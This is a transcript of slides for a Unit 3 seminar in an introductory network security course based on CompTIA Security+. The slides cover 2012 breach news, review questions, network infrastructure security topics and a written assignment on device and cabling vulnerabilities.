UNIT 3 SEMINAR Unit 3 Chapter 3 in CompTIA Security + Course Name – IT286-01 Introduction to...
-
Upload
blaise-morris -
Category
Documents
-
view
220 -
download
0
Transcript of UNIT 3 SEMINAR Unit 3 Chapter 3 in CompTIA Security + Course Name – IT286-01 Introduction to...
UNIT 3 SEMINAR
Unit 3Unit 3Chapter 3 in CompTIA Security Chapter 3 in CompTIA Security
++
Course Name – IT286-01 Introduction to Network SecurityInstructor – Jan McDanolds, MS, Security+Contact Information: Google chat - jmcdanolds Email – [email protected] Hours: Tuesday, 7:00 PM ET or Thursday, 7:00 PM ET
UNIT 3
Security in the news…July 12, 2012Hackers post 450K credentials apparently pilfered from YahooYahoo appears to have been the victim of a security breach that yielded more than hundreds of thousands of login credentials stored in plain text. The hacked data, posted to the hacker site D33D Company, contained more than 453,000 login credentials and appears to have originated from the Web pioneer’s network. The hackers, who said they used a union-based SQL injection technique to penetrate the Yahoo subdomain (Yahoo Voices), intended the data dump to be a “wake-up call.”http://www.databreaches.net/?p=24724
Follow-up: Regulators criticize NYSEG for computer security breachThe New York State Public Service Commission (Commission) today received a report from Department of Public Service staff that both New York State Electric & Gas Corporation (NYSEG) and Rochester Gas & Electric (RG&E) failed to adequately protect confidential customer information from unauthorized access by outside parties.
In January 2012, NYSEG advised the Department that unauthorized parties had obtained access to confidential information of both NYSEG and RG&E customers, including Social Security Numbers, dates of birth, and in some cases, financial institution account information. http://www.databreaches.net/?p=24738
UNIT 3
Security in the news…Living a Lie - Identity Theft That Lasted Decades 10/1/2012When Florida Highway Patrol Trooper Richard Blanco—a member of the FBI’s Joint Terrorism Task Force (JTTF) in Jacksonville—interviewed an individual suspected of driver’s license fraud in 2011, he wasn’t initially sure if the man was the victim or the perpetrator of identity theft.
That’s because the man—now imprisoned and officially known as John Doe—had a stack of government-issued identification acquired during the 22 years he had been using a living victim’s identity. That included a passport, driver’s license, birth certificate, Social Security card, and identification allowing him unescorted access to a port and military installation.
http://www.fbi.gov/news/stories/2012/october/identity-theft-that-lasted-decades
UNIT 3
Security in the news…Information Technology Sector DHS Daily Open Source Infrastructure Report
October 2, Softpedia – (International) Prolexic: ‘itsoknoproblembro’ DDoS attacks are highly sophisticated. Experts from Prolexic Technologies claim a new type of distributed denial-of-service (DDoS) attack has not only increased in size, but also reached a new level of sophistication. DDoS attacks have recently caused a lot of problems for organizations; in September, the sites of several financial institutions were disrupted as a result of such operations. Prolexic found that many of the recent attacks against their customers relied on the itsoknoproblembro DDoS toolkit. Prolexic recorded massive sustained floods, some of which peaked at 70 Gbps and over 30 million pps. Itsoknoproblembro includes a number of application layer and infrastructure attack vectors, such as UDP and SSL encrypted attack types, SYN floods, and ICMP. The botnet that powers these attacks contains a large number of legitimate IP addresses. This allows the attack to bypass the anti-spoofing mechanisms deployed by companies. The DHS Daily Open Source Infrastructure Report is collected each business day as a summary of open-source published information concerning significant critical infrastructure issues. https://www.dhs.gov/dhs-daily-open-source-infrastructure-report
UNIT 2 REVIEW
What was covered in Unit 2…
Chapter 2 Review – Identifying Potential RisksIf you don’t know what you’re up against, how do you prepare…
Calculating Attack StrategiesRecognizing Common AttacksIdentifying TCP/IP Security ConcernsUnderstanding Software ExploitationUnderstanding OVALSurviving Malicious CodeUnderstanding Social EngineeringAuditing Processes and Files
UNIT 2 REVIEW
What was covered in Unit 2…
Chapter 2 - Identifying Potential RisksAttacks Strategies – the bad guys have one or more of these goals:
1. Access attack – access to resources2. Modification or repudiation attack – modify information3. Denial-of-service attack – disrupt the network, denying users
access
Social engineering - preys on the trusting nature of people to breach security.
Auditing Processes and Files - security log files, security audit files
CHAPTER 2 REVIEW
Common Attacks
Rapid Fire… Open your ebook file to Chapter 2. Quick definitions.
Type a brief definition.
#1 – What is a zombie? What runs on a zombie?
CHAPTER 2 REVIEW
Common Attacks
Rapid Fire… (continued)
#2 - Name two…
Back Door Attacks
CHAPTER 2 REVIEW
Common Attacks
Rapid Fire… (continued)
#3 – Name two types of…
Password guessing attacks
CHAPTER 2 REVIEW
Common Attacks
Rapid Fire… (continued)
#4 – Give the TCP Port Number of …
SNMP, HTTPS, and DNS
CHAPTER 1 REVIEW
General Security Concepts
Rapid Fire… (continued)
#2 - Name the…
Three components of Physical Security
UNIT 3 - CHAPTER 3
Infrastructure and ConnectivityProtecting the flow of data…
Understanding Infrastructure SecurityUnderstanding Network Infrastructure DevicesMonitoring and Diagnosing NetworksSecuring Workstations and ServersUnderstanding Mobile DevicesUnderstanding Remote AccessSecuring Internet ConnectionsUnderstanding Network ProtocolsBasics of Cabling, Wires and CommunicationsEmploying Removable Media
CHAPTER 3
Understanding Infrastructure Security
How information flows…
Hardware Components: Physical devices, such as routers, servers, firewalls, switches, workstations etc.
Software Components: Includes operating systems, applications, and management software
Example: NOC – Network Operations CenterAT&T Global Network Operations Centerhttp://www.corp.att.com/gnoc/IP Backbone - AT&T has over 940,000 worldwide fiber-route miles, a worldwide network that includes 232,798 Wi-Fi hotspots, 16.4 million broadband connections in service, and more than 105 million wireless customers. The network carries approximately 33 petabytes of data on an average business day.
CHAPTER 3
Field Trip…Visit to Akamai Technologies‘ state-of-the-art Network Operations Command Center, located in Cambridge, Massachusetts. The Akamai NOCC enables proactive monitoring and troubleshooting of all servers in the global Akamai network. 20 minute video
ONLY first 3 minutes - view the entire tour later… http://www.akamai.com/html/technology/nocc.html
14
Real Time Monitoring
CHAPTER 3
Network Infrastructure Devices
Firewall – the purpose is to isolate one network from another. Firewalls can be hardware, software, appliances, etc.
Types: Packet filter, proxy, stateful inspectionHubSwitchRouterModemRemote Access ServicesTelecom/PBX SystemsVirtual Private NetworksWireless Access Points
CHAPTER 3
Monitoring/Diagnosing NetworksWhat you don’t know can hurt you…Network Monitors (sniffers)Intrusion Detection Systems - IDS (discussed later)
Field Trips…http://learn-networking.com/network-security/three-archaic-backdoor-trojan-
programs-that-still-serve-great-pranks
Back Orifice 2000 – be careful! http://support.microsoft.com/kb/237280
Nmap ("Network Mapper") is a free utility for network exploration or security auditing. http://nmap.org/
Password Crackershttp://sectools.org/crackers.html
CHAPTER 3
Securing Workstations and Servers
Hardening systems:
Both workstations and servers are vulnerable.
Remove unused software, services and processesEnsure that all workstations, servers and applications are up to date - Patches, updates, fixes
Minimize information dissemination about the system
Ex: Lock down configuration settings, use group policies and security templates, disable unneeded functions, evaluate sharing services. Windows Server 2008 – Security Configuration Wizard
CHAPTER 3
Understanding Mobile Devices
Who is connecting to your network through a wireless device?
Include pagers, PDAs, cell phones, etc.WTLS layer (Wireless Transport Layer Security)WAP (Wireless Access Protocol) Wireless Session Protocol (WSP)
CHAPTER 3
Understanding Remote Access
Point-to-Point Protocol (PPP) plus CHAP – Challenge Handshake Authentication ProtocolTunneling Protocols
PPTPL2FL2TPSecure ShellIPSec (IP Security used with tunneling protocols)
802.1x Wireless ProtocolsRADIUSTACACS/+
CHAPTER 3
Securing Internet Connections
Ports and Sockets
E-mailE-mail protocols
SMTPPOP/POP3IMAP
E-mail vulnerabilitiesSPAMHoaxes
WebSecure web connections
SSL/TLSHTTP/S
Web vulnerabilitiesActiveXBuffer OverflowsCGICookiesCross-site Scripting (XSS)Input validationJava AppletsJavaScriptPopupsSigned AppletsSMTP Relay
FTPBlind/Anonymous FTPSecure FTPSharing FilesVulnerabilities
CHAPTER 3
Securing Internet Connections
ISPs like Akamai, AT&T, etc. protect data transmissions from attack
Example: State of the Internet Report
Each quarter, Akamai publishes a quarterly "State of the Internet" report. This report includes data gathered across Akamai's global server network about attack traffic, average & maximum connection speeds, Internet penetration and broadband adoption, and mobile usage, as well as trends seen in this data over time.
Posted in Doc Sharing – .pdf shows slides of report
http://www.akamai.com/stateoftheinternet/
CHAPTER 3
Ports, Sockets and Sniffers
Port Scanners:http://sectools.org/port-scanners.html
Packet Sniffers:http://sectools.org/sniffers.htmlhttp://www.wireshark.org/download.html
Vulnerability Scanners:http://sectools.org/tag/vuln-scanners/
CHAPTER 3
SNMP and Other TCP/IP Protocols
Simple Network Management Protocol (SNMP)Internet Control Message Protocol (ICMP)Internet Group Message Protocol (IGMP)
ICMP vulnerability - A denial of service vulnerability exists that could allow an attacker to send a specially crafted Internet Control Message Protocol (ICMP) message to an affected system.
http://www.securiteam.com/exploits/5SP0N0AFFU.htmlhttp://www.securiteam.com/securitynews/
CHAPTER 3
Cabling, Wires and Communications
CoaxUnshielded and Shielded Twisted Pair (UTP/STP)Fiber Optic InfraredRadio FrequencyMicrowave
CHAPTER 3
Removable Media
Data on the move…
CD-R/DVD-RDiskettesFlash CardsHard DrivesNetwork Attached StorageSmart CardsTapeThumb Drives
UNIT 3
Unit 3 AssignmentUnit 3 Assignment
1. Explain the vulnerabilities and mitigations associated with network devices (hardware). 2. Explain the vulnerabilities and mitigations associated with various transmission media such as coax, UTP, fiber, etc.
UNIT 3
Unit 3 Assignment1. Explain the vulnerabilities and mitigations associated
with network devices (hardware).At least five devices – firewall, router, switch, etc.
Example: discuss how a router works, how it is vulnerable to attack/malfunction, AND how it can be protected. One paragraph for each of five devices.
2. Explain the vulnerabilities and mitigations associated with various transmission media such as coax, UTP, fiber, etc. At least one paragraph on these three.